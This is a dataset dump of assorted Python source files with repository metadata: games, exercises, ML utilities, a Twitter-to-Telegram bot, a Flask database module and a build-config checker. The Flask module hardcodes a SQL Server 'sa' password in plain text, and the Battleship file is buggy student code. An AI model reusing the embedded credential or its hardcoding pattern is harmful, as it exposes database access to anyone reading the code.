0c8dbe74adc8ca98c7a8a97c57dba338118c9c61 | Python | ehsansh84/services | /bigtc/handlers/crawler.py | UTF-8 | 828 | 2.515625 | 3 | [] | no_license | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import tornado.web
import redis
class CrawlerHandler(tornado.web.RequestHandler):
def get(self, *args, **kwargs):
r_server = redis.Redis('localhost')
crawler_data = {
'status': '',
'expire': -1
}
action = self.get_argument('action', '')
if action == 'start':
r_server.set('crawler_stat', 'Running')
r_server.expire('crawler_stat', 20)
crawler_data['status'] = 'Running'
crawler_data['expire'] = 20
elif action == 'update':
crawler_data['status'] = r_server.get('crawler_stat')
crawler_data['expire'] = r_server.ttl('crawler_stat')
# self.write('Started')
self.render('crawler.html', crawler_data=crawler_data)
| true |
31a61e754098e40f39ee279f894a57953572b94d | Python | ahmadturkmani/CPSC231 | /Battleship/Ahmed/Battleship41.py | UTF-8 | 3,830 | 4.1875 | 4 | [
"MIT"
] | permissive | #********************************************
# By Ahmed Elbannan
# September 22nd 2013
# Battleship CPSC231 (Limited Edition! ;] )
#********************************************
# global variables
direction = 'horizontal';
x = ord('A');
y = 0;
# Title Screen! Now a function!
def print_titlescreen():
print();
print('________________________________________');
print('|*********WELCOME TO BATTLESHIP!*******|');
print('|**************************************|');
print('|**************************************|');
print('|*********A game like no other!********|');
print('|**************************************|');
print('|**************************************|');
print('|**************************************|');
print();
return;
# end
def print_vessel(name):
print('Your ' + name + ' is located at (' + chr(x + ord('A')) + ', ' + str(y + 1) + ')');
print('It is positioned ' + direction + 'y.');
print();
return;
# end
def get_location(name, spaces):
global x; # this function can edit x
global y; # this function can edit y
print ('Where would you like to place your ' + name + ' (' + str(spaces) + ' spaces)');
x = input('Enter horizontal position (A-J):');
y = input('Enter vertical position (1-10) :');
print();
return;
# end
# Calculate next ship position based on previous ship dimensions
def modify_row(name, size):
global y; # this function can edit y
y = (y + size) % 10;
print_vessel(name);
return;
# end
# Calculate next ship position based on previous ship dimensions
def modify_column(name, size):
global x; # this function can edit x
x = (x + size) % 10;
print_vessel(name);
return;
# end
def validate_location(name, size, direction):
global x; # this function can edit x
global y; # this function can edit y
# check if string is a single letter or smaller than a three digit number, if not, asks for input again, then checks
if (len(x) == 1) and (len(y) < 3):
x = (ord(x) - ord('A'));
y = (int(y) - 1);
# checks if location is on the board and if the ship will fit, if not asks for input again and checks again
if (direction == 'horizontal') and (-1 < x < (10 - size)) and (-1 < y < 10):
print_vessel('Aircraft Carrier');
print('The end of your ' + name + ' is located at (' + chr(((x + size - 1) % 10) + ord('A')) + ', ' + str(y + 1) + ')');
print();
elif direction == 'vertical' and (-1 < y < (10 - size)) and (-1 < x < 10):
print_vessel('Aircraft Carrier', x, y, direction);
print('The end of your ' + name + ' is located at (' + chr(x + ord('A')) + ', ' + str(((y + size - 1) % 10) + 1) + ')');
print();
else:
print('The location you entered is not on the board!');
get_location('Aircraft Carrier', 5);
validate_location(name, size, direction);
else:
print('Please enter a LETTER (between A-J) and a NUMBER (between 1-10!)');
get_location('Aircraft Carrier', 5);
validate_location(name, size, direction);
return;
def enter_choice():
choice = '';
while not choice == 'q':
choice = input('Enter choice: ');
return;
def main():
global direction; # this function can edit direction
# prints name, location, and orientation of a vessel
print_titlescreen();
# Ask user to place aircraft carrier
get_location('Aircraft Carrier', 5);
direction = 'horizontal';
validate_location('Aircraft Carrier', 5, direction);
# based on input, calculate the position of the battleship
direction = 'vertical';
modify_column('Battleship', 5);
# now calculate position of sub
direction = 'horizontal';
modify_row('Submarine', 4);
# the same with the destroyer
direction = 'vertical';
modify_column('Destroyer', 3);
#loop until q is entered
enter_choice();
return;
# end
main();
| true |
cb82c9d4823fa3cf522e68655129cb51a44214e1 | Python | xikunqu/Python_100_days | /D1-15/Day7/eg3.py | UTF-8 | 623 | 3.8125 | 4 | [] | no_license | def main():
fruits=['grape','apple','strawberry','waxberry']
fruits+=['pitaya','pear','mango']
#循环遍历列表元素
for fruit in fruits:
print(fruit.title(),end=' ')
print()
#列表切片
fruits2=fruits[1:4]
print(fruits2)
#fruits3=fruits #没有复制列表只创建了新的引用
#可以通过完整切片操作来复制列表
fruits3=fruits[:]
print(fruits3)
fruits4=fruits[-3:-1]
print(fruits4)
#可以通过反向切片操作来获得倒转后的列表的拷贝
fruits5=fruits[::-1]
print(fruits5)
if __name__=='__main__':
main() | true |
fa96017b58807484e1f84b74b3e3460ad5557992 | Python | alysivji/talks | /code-smell--if-statements/examples/polymorphic_animals.py | UTF-8 | 255 | 3.671875 | 4 | [] | no_license | class Animal:
def __init__(self, name):
self.name = name
def speak(self):
raise NotImplementedError
class Cat(Animal):
def speak(self):
return "Meow!"
class Dog(Animal):
def speak(self):
return "Woof!"
| true |
ce0927c70ee24243b0a5a1d8f8ccd415ba0018c8 | Python | ES654/assignment-2-yadavsunny05 | /tree/utils.py | UTF-8 | 2,645 | 2.953125 | 3 | [] | no_license |
import math
import numpy as np
import pandas as pd
def entropy(Y):
entro = 0.0
sample_count = dict()
for i in range(len(Y)):
if(str(Y[i]) in sample_count):
sample_count[str(Y[i])] +=Y[i][-1]
else:
sample_count[str(Y[i])] =Y[i][-1]
for i in sample_count.keys():
prob = (sample_count[i]/np.sum(Y[:,-1]))
entro -= (prob*math.log(prob,2))
return entro
pass
def info_gain_real_discrete(left,right,current):
return entropy(current) - entropy(left)*sum(left[:,-1])/(sum(left[:,-1])+sum(right[:,-1])) - entropy(right)*sum(right[:,-1])/(sum(left[:,-1])+sum(right[:,-1]))
def split(rows,threshold,col):
left,right = [],[]
for row in rows:
if(row[col]>=threshold):
right.append(row)
else:
left.append(row)
if(len(left) == 0 or len(right) == 0):
return None,None
return left,right
def best_split(rows):
best_gain=-99999
threshold= -99999
index = 0
best_left = None
best_right = None
current=entropy(rows[:])
for col in range(len(rows[0])-2):
thresholds=set([row[col] for row in rows])
for i in thresholds:
left,right=split(rows,i,col)
if((left!=None)and(right!=None)):
left = pd.DataFrame(left)
right = pd.DataFrame(right)
left = np.array(left)
right = np.array(right)
temp=info_gain_real_discrete(left,right,rows)
if temp>=best_gain:
best_left = np.array(left)
best_right = np.array(right)
best_gain = temp
threshold=i
index = col
return best_gain,threshold,index,best_left,best_right
def best_split_Real_Real(Y,attr):
splitarr = []
for i in range(len(attr)):
splitarr.append([Y[i],attr[i]])
splitarr = np.array(sorted(splitarr,key = lambda x:x[0]))
min_info=999999
split_value=0
for i in range(1,len(Y)):
temp = np.var(splitarr[:i,1]) + np.var(splitarr[i:,1])
if(min_info>temp):
min_info = temp
split_value=(splitarr[i,1]+splitarr[i-1,1])/2
return((min_info,split_value))
def information_gain(Y, attr,weight):
initial_gain = entropy(Y)
y_val = dict()
indexes=list(Y.index)
for index in indexes:
y_val[attr[index]]=[]
for index in indexes:
y_val[attr[index]].append(Y[index])
for i in y_val:
initial_gain-=entropy(y_val[i])*(len(y_val[i])/len(list(Y.index)))
return(initial_gain)
| true |
fd115b36382655300abaa5914b0ebe1d1c2635cc | Python | fenght96/Detection_maybe | /im_read_and_show.py | UTF-8 | 593 | 2.625 | 3 | [] | no_license | import matplotlib.pyplot as plt
import matplotlib.image as mpimg
fig = plt.figure()
plt.subplots_adjust(wspace =0, hspace =0)
img_list = []
i = 1
for path in ['./', './']:
for img in img_list:
for xx in ['rgb', 'trm']:
img1 = mpimg.imread(path + xx +'/' + img + '.jpg')
if xx == 'trm':
ax = fig.add_subplot(4, 6, i + 6)
else:
ax = fig.add_subplot(4, 6, i)
ax.imshow(img1)
plt.axis('off')
i += 1
i += 6
plt.savefig('./imshow.jpg')
plt.show()
| true |
31f82d9f2a5b5b53f46541165351b430b187dae4 | Python | mrFred489/AoC2018 | /17.py | UTF-8 | 4,499 | 2.65625 | 3 | [] | no_license | from collections import *
import itertools
import random
import sys
import re
f = open("17.txt").read().split("\n")
# f = open("17.example").read().split("\n")
m = []
bounds = defaultdict(set)
for line in f:
if line == "":
continue
line = line.split(", ")
c1, c1d = line[0].split("=")
c1d = int(c1d)
c2, c2d = line[1].split("=")
c2d = c2d.split("..")
# print(c2d)
# print(int(c2d[0]), int(c2d[1]))
c2d = set(range(int(c2d[0]), int(c2d[1])+1))
if c1 == "y":
bounds[c1d] = bounds[c1d].union(c2d)
elif c1 == "x":
for y in c2d:
bounds[y].add(c1d)
water_coords = set()
still_water = set()
work = set()
# for v, i in bounds.items():
# print(v, i)
maxy = max(bounds.keys())
miny = min(bounds.keys())
water_coords.add((500, miny))
work.add((500, miny))
print(miny, maxy)
iterations = 0
while True:
if len(work) == 0:
break
old_work = work
work = set()
old_water_coords = water_coords.copy()
old_still_water = still_water.copy()
for x, y in old_water_coords:
if (x, y) in still_water or y > maxy:
continue
if x not in bounds[y+1] and (x, y+1) not in still_water and y <= maxy:
water_coords.add((x, y+1))
work.add((x, y+1))
elif x in bounds[y+1] or (x, y+1) in still_water:
# print(x, y, bounds[y])
# print(bounds[y+1])
# print(x-1 not in bounds[y] and (x-1, y) not in water_coords)
if x-1 not in bounds[y]:
# print(x-1)
water_coords.add((x-1, y))
work.add((x-1, y))
else:
dx, dy = x, y
while (dx, dy) in water_coords:
if dx in bounds[dy+1] or (dx, dy+1) in still_water:
if dx+1 in bounds[dy]:
for i in range(x, dx+1):
still_water.add((i, y))
break
dx += 1
else:
break
if x+1 not in bounds[y]:
water_coords.add((x+1, y))
work.add((x+1, y))
else:
dx, dy = x, y
while (dx, dy) in water_coords:
if dx in bounds[dy+1] or (dx, dy+1) in still_water:
if dx-1 in bounds[dy]:
for i in range(dx, x+1):
still_water.add((i, y))
break
dx -= 1
else:
break
# if iterations % 1000 == 0:
# maxx = max([x for x, y in water_coords])
# minx = min([x for x, y in water_coords])
# for vals in bounds.values():
# if len(vals) == 0:
# continue
# mx = min(vals)
# mm = max(vals)
# if mx < minx:
# minx = mx
# if mm > maxx:
# maxx = mm
# res = ""
# for y in range(miny, maxy+1):
# for x in range(minx-1, maxx+1):
# if (x, y) in still_water:
# res += "~"
# elif (x, y) in water_coords:
# res += "|"
# elif x in bounds[y]:
# res += "#"
# else:
# res += "."
# res += "\n"
# print(res)
if water_coords == old_water_coords and still_water == old_still_water:
break
iterations += 1
maxx = max([x for x, y in water_coords])
minx = min([x for x, y in water_coords])
for vals in bounds.values():
if len(vals) == 0:
continue
mx = min(vals)
mm = max(vals)
if mx < minx:
minx = mx
if mm > maxx:
maxx = mm
res = ""
for y in range(miny, maxy+1):
for x in range(minx-1, maxx+1):
if (x, y) in still_water:
res += "~"
elif (x, y) in water_coords:
res += "|"
elif x in bounds[y]:
res += "#"
else:
res += "."
res += "\n"
# print(res)
# print(miny, maxy)
# print("still", sorted([(y, x) for x, y in still_water]))
# print("water", sorted([(y, x) for x, y in water_coords]))
print("part1", len([(x, y) for x, y in water_coords if miny <= y <= maxy]))
print("part2", len([(x, y) for x, y in still_water if miny <= y <= maxy]))
| true |
ec12f074c7630c11f6218f94a57cc8ecfadcfe19 | Python | anantkaushik/algoexpert | /Balanced-Brackets.py | UTF-8 | 898 | 4.25 | 4 | [] | no_license | """
Problem Link: https://www.algoexpert.io/questions/Balanced%20Brackets
Write a function that takes in a string made up of brackets ("(", "[", "{", ")", "]", and "}") and other optional characters.
The function should return a boolean representing whether or not the string is balanced in regards to brackets.
A string is said to be balanced if it has as many opening brackets of a given type as it has closing brackets of that type and
if no bracket is unmatched. Note that a closing bracket cannot match a corresponding opening bracket that comes after it.
Similarly, brackets cannot overlap each other as in "[(])".
"""
def balancedBrackets(string):
# Write your code here.
stack = []
for c in string:
if c in ["(","{","["]:
stack.append(c)
else:
if len(stack) < 1:
return False
if stack.pop()+c not in ["()","[]","{}"]:
return False
return len(stack) == 0
| true |
b877d0459a9107e8dacde3f80f235b8d354ddcbf | Python | bauer90/scaling-hipster | /apr17/7_4.py | UTF-8 | 1,229 | 3.78125 | 4 | [] | no_license | # implements 'substitution' operation using only 'addition'
def sub_using_add(a, b):
return a + negate_using_add(b)
# implements 'multiplication' operation using only 'addition'
def mult_using_add(a, b):
result = 0
abs_a = my_abs(a)
abs_b = my_abs(b)
for i in range(0, abs_b):
result += abs_a
if (a > 0 and b > 0) or (a < 0 and b < 0):
return result
else:
return negate_using_add(result)
# implements integer's 'division' operation using only 'addition'
def div_using_add(a, b):
abs_a = my_abs(a)
abs_b = my_abs(b)
result = 0
while abs_a >= 0:
abs_a -= abs_b
result += 1
result -= 1
if (a > 0 and b > 0) or (a < 0 and b < 0):
return result
else:
return negate_using_add(result)
# UTILITY FUNCTIONS ---
# absolute value
def my_abs(a):
if a >= 0:
return a
else:
return negate_using_add(a)
# turns a positive number to negative using only 'addition'
# (not sure if it's legit: number -1 used somewhere)
def negate_using_add(a):
neg = 0
if a == 0:
return 0
elif a > 0:
d = -1
else:
d = 1
while a != 0:
neg += d
a += d
return neg | true |
1f2db8e70adfe7867430f59ba087b65dd422503a | Python | PaulMaillard/algo | /python/fonctions.py | UTF-8 | 370 | 3.859375 | 4 | [] | no_license | #Les fonctions
#by Paul Personne
#Beweb Lunel
evenement = ["pleut", "beau", "neige", "grele"]
def affichageDuTemps(temps) :
if temps == "beau" :
temps = "fait " + temps
print("Il " + temps)
longueurDuTableau = len(evenement)
for i in range(longueurDuTableau) : #pour i = 0 a i < longueur du tableau
event = evenement[i] #valeur pointee par l'index
affichageDuTemps(event)
| true |
1f7cd4809a0aefbf059531010088a9c58e4d9fd8 | Python | christhemastercoder/flaskapp2 | /api/user_db2.py | UTF-8 | 921 | 2.6875 | 3 | [] | no_license | import pyodbc as po
from flask import jsonify
server = '127.0.0.1,1433'
database = 'People'
username = 'sa'
password = '615Laurafc!@'
cnxn = po.connect('DRIVER={ODBC Driver 17 for SQL Server};SERVER=' + server + ';DATABASE='+database+';UID='+username+';PWD=' + password)
cursor = cnxn.cursor()
def getAllPeople():
cursor.execute("""EXEC dbo.Get_Everybody""")
data = []
for row in cursor:
strform = str(row)
strform = strform[1:]
strform = strform[:-1]
strform = strform.replace("'", "")
data.append(strform)
cnxn.commit()
return jsonify(data)
def getAllPeople2():
cursor.execute("""EXEC dbo.Get_Everybody""")
data = []
for row in cursor:
tempobj = {
"name" : str(row[0]),
"age": row[3],
"position": str(row[2]),
"id":row[1]
}
data.append(tempobj)
return jsonify(data)
| true |
d42598e1307a63717ae687dc8ee53e538c0ae8d7 | Python | mezhebovskyy/studying | /structure_models/some_various_examples/tweetcount.py | UTF-8 | 963 | 3.3125 | 3 | [] | no_license | tweetLength = 10
fileName = "tweetspile.txt"
def main():
displayTweets()
while True:
sentence = raw_input("Make us happy with your new thoughts using Twitter: ")
if sentence == ".":
break
if len(sentence) <= tweetLength:
savetofile(sentence)
if len(sentence) > tweetLength:
tweetmass = [sentence[i:i+tweetLength] for i in range(0, len(sentence), tweetLength)]
for i in tweetmass:
savetofile(i)
def savetofile(lines):
print "Now saving to file %r..." % fileName
f = open(fileName, 'a')
f.write(lines + '\n\n')
f.close()
def displayTweets():
f = open(fileName, "r")
fileContent = f.read()
tweets = fileContent.split("\n\n")
for tweet in tweets:
if len(tweet) == 0:
break
index = tweets.index(tweet) + 1
print "tweet %s: " % index + tweet
f.close()
if __name__== "__main__":
main() | true |
5ad1a67b28d1ac9729393e365b7ec518af5f119c | Python | amogh7joshi/deeptoolkit | /deeptoolkit/losses.py | UTF-8 | 2,732 | 3.046875 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python3
# -*- coding = utf-8 -*-
from __future__ import absolute_import
from tensorflow.keras.losses import Loss
import deeptoolkit.core.functional as F
from deeptoolkit.internal.conversion import apply_tensor_conversion
__all__ = ['BinaryFocalLoss', 'CategoricalFocalLoss']
class BinaryFocalLoss(Loss):
"""Binary focal loss function from the paper `Focal Loss for Dense Object Detection`.
Computes binary focal loss given a ground truth object and a prediction object.
Usage:
You can use it to directly compute loss on two inputted objects.
>>> bfl = BinaryFocalLoss()
>>> truth = [1, 2, 3, 4]
>>> predicted = [0.97, 2.6, 4.1, 2.9]
>>> loss_value = bfl(truth, predicted)
You can also use it in a regular Keras model training pipeline.
>>> model.compile(
>>> optimizer = 'adam',
>>> loss = BinaryFocalLoss(),
>>> metrics = ['accuracy']
>>> )
Arguments:
- y_true: A ground truth object.
- y_pred: A prediction object.
- gamma: Focus parameter for the modulating factor.
- alpha: The weighting factor in cross-entropy.
Returns:
- A 1-dimensional Tensor containing the loss value.
"""
def __init__(self, *, gamma = 2.0, alpha = 0.25):
super(BinaryFocalLoss, self).__init__()
self.gamma = gamma
self.alpha = alpha
@apply_tensor_conversion
def call(self, y_true, y_pred):
return F.binary_focal_loss(y_true, y_pred, gamma = self.gamma, alpha = self.alpha)
class CategoricalFocalLoss(Loss):
"""Categorical focal loss function from the paper `Focal Loss for Dense Object Detection.`
Computes binary focal loss given a ground truth object and a prediction object.
Usage:
You can use it to directly compute loss on two inputted objects.
>>> cfl = CategoricalFocalLoss()
>>> truth = [1, 2, 3, 4]
>>> predicted = [0.86, 2.1, 4.9, 3.6]
>>> loss_value = cfl(truth, predicted)
You can also use it in a regular Keras model training pipeline.
>>> model.compile(
>>> optimizer = 'adam',
>>> loss = CategoricalFocalLoss(),
>>> metrics = ['accuracy']
>>> )
Arguments:
- y_true: A ground truth object.
- y_pred: A prediction object.
- gamma: Focus parameter for the modulating factor.
- alpha: The weighting factor in cross-entropy.
Returns:
- A 1-dimensional Tensor containing the loss value.
"""
def __init__(self, *, gamma = 2.0, alpha = 0.25):
super(CategoricalFocalLoss, self).__init__()
self.gamma = gamma
self.alpha = alpha
@apply_tensor_conversion
def call(self, y_true, y_pred):
return F.categorical_focal_loss(y_true, y_pred, gamma = self.gamma, alpha = self.alpha)
| true |
0700e3f776a227a1e83b97da0807bfe378b9ebd9 | Python | 5l1v3r1/feh_bot | /tweet_listener.py | UTF-8 | 1,350 | 2.75 | 3 | [
"MIT"
] | permissive | import tweepy
import time
import telegram
#TODO: may need to figure out if external class can be used or not, need the list of chats and stuff
# Listener for Twitter, overrides tweepy's StreamListener to provide
# functionality for telegram
class TweetStreamListener(tweepy.StreamListener):
def on_status(self, status):
#print(status.text)
#print(self.telegram.get_me())
for id in self.chat_map[status.author]:
self.telegram.send_message(id, status.text)
if time.time() < self.limit:
return True
else:
return False
# start doing cool things on update
# On rate limit over, disconnect stream
# else restart stream
def on_error(self, status_code):
if status_code != 420:
return False
else:
return True
# update chat_map
def update(self, account, id):
self.chat_map[account].append(id)
def get_chat_map(self):
return self.chat_map
# Passes twitter api and telegram bot as "instance variables" (not sure
# what) equivalent in python is
def __init__(self, twitter, bot, chat_map, time_limit=60):
self.api = twitter
self.telegram = bot
self.chat_map = chat_map
self.limit = time.time() + time_limit
#print(bot.get_me()) | true |
26fe0e5fe2c16088f2b2404755cfde1aaf4992f3 | Python | ARM-software/bob-build | /scripts/check_config_usage.py | UTF-8 | 5,676 | 2.875 | 3 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env python3
import argparse
import fnmatch
import os
import re
import sys
class Configs:
_configs = dict()
# Support the in keyword
def __contains__(self, key):
return key in self._configs
# Record a new config
def append(self, config, file, line):
self._configs[config] = {"file": file, "line": line}
# Return a list of all configs
def keys(self):
return self._configs.keys()
# Return the file where a config is defined
def file(self, config):
return self._configs[config]["file"]
# Print an issue to stdout
def print_issue(self, type, config, file, line):
print(
"%s,%s,%d,%s,%d,%s"
% (
config,
file,
line,
self._configs[config]["file"],
self._configs[config]["line"],
type,
)
)
# Find files matching pattern under the directory top
# Returns a list of filenames (which include top as prefix)
def find_files(top, pattern):
matches = []
for root, dirnames, filenames in os.walk(top):
for filename in fnmatch.filter(filenames, pattern):
matches.append(os.path.join(root, filename))
return matches
# b is in the same subtree as a
#
# Assumes no symlinks. If a and b are relative, they are from the same
# starting location.
def same_subtree(a, b):
dira = os.path.dirname(a)
dirb = os.path.dirname(b)
return dirb.startswith(dira)
# Collect all definitions in all Mconfigs
# Returns a dictionary with each config as key
def get_config_definitions(mconfigs):
configs = Configs()
re_configdef = re.compile(r"^config ([A-z_][A-z0-9_]*)")
for mconfig in mconfigs:
with open(mconfig, "r") as f:
lineno = 0
for line in f:
lineno += 1
m = re_configdef.match(line)
if m:
key = m.group(1)
if key in configs:
msg = "Error %s already defined in %s. Also in %s\n"
sys.stderr.write(msg % (key, configs.file(key), mconfig))
else:
configs.append(key, mconfig, lineno)
return configs
# Look for all occurrences of defined configs in Mconfig files.
def check_mconfig_refs(mconfigs, configs):
keyre = str.join("|", configs.keys())
re_configs = re.compile(r"\b(" + keyre + ")\b")
for mconfig in mconfigs:
with open(mconfig, "r") as f:
lineno = 0
for line in f:
lineno += 1
# Strip out single line comments
line = line.split("#")[0]
matches = re_configs.findall(line)
for key in matches:
if not same_subtree(configs.file(key), mconfig):
configs.print_issue("Mconfig", key, mconfig, lineno)
# Look for all occurrences of defined configs in Blueprint files.
# In blueprint the reference can only occur in a feature or a template
def check_blueprint_refs(blueprints, configs):
keyre = str.join("|", configs.keys())
keyre = keyre.lower()
re_featureref = re.compile(r"[ \t]*(" + keyre + ")[ \t]*:")
re_templateref = re.compile(r"{{(?:.+ *)?\.(" + keyre + ")}}")
for blueprint in blueprints:
with open(blueprint, "r") as f:
lineno = 0
for line in f:
lineno += 1
# Strip out single line comments
line = line.split("//")[0]
m = re_featureref.match(line)
if m:
key = m.group(1).upper()
if not same_subtree(configs.file(key), blueprint):
configs.print_issue("bp feature", key, blueprint, lineno)
matches = re_templateref.findall(line)
for key in matches:
key = key.upper()
if not same_subtree(configs.file(key), blueprint):
configs.print_issue("bp template", key, blueprint, lineno)
def main():
summary = """
Detect usage of config variables outside of the tree they are
defined in. This script can be used to help detect potential
issues if subtrees can be excluded.
"""
epilog = """
The output is comma separated text of with a header row describing
the fields. The header row starts with '#' to allow sorting.
"""
parser = argparse.ArgumentParser(description=summary, epilog=epilog)
parser.add_argument(
"path", nargs="?", default=os.getcwd(), help="Directory to scan"
)
parser.add_argument(
"--nom", default=False, action="store_true", help="Don't check Mconfig files"
)
parser.add_argument(
"--nob", default=False, action="store_true", help="Don't check Blueprint files"
)
args = parser.parse_args()
check_bp = not args.nob
check_mc = not args.nom
# Find all Mconfig files
mconfigs = find_files(args.path, "Mconfig")
# Table header
print("# Config, Referenced from, Ref line, Defined in, Def line, Type")
# Find all configs and where they are defined
defs = get_config_definitions(mconfigs)
if check_mc:
# Check Mconfigs for where configs are referenced
check_mconfig_refs(mconfigs, defs)
if check_bp:
# Find all bp files
blueprints = find_files(args.path, "*.bp")
# Check bps for where configs are referenced
check_blueprint_refs(blueprints, defs)
if __name__ == "__main__":
main()
| true |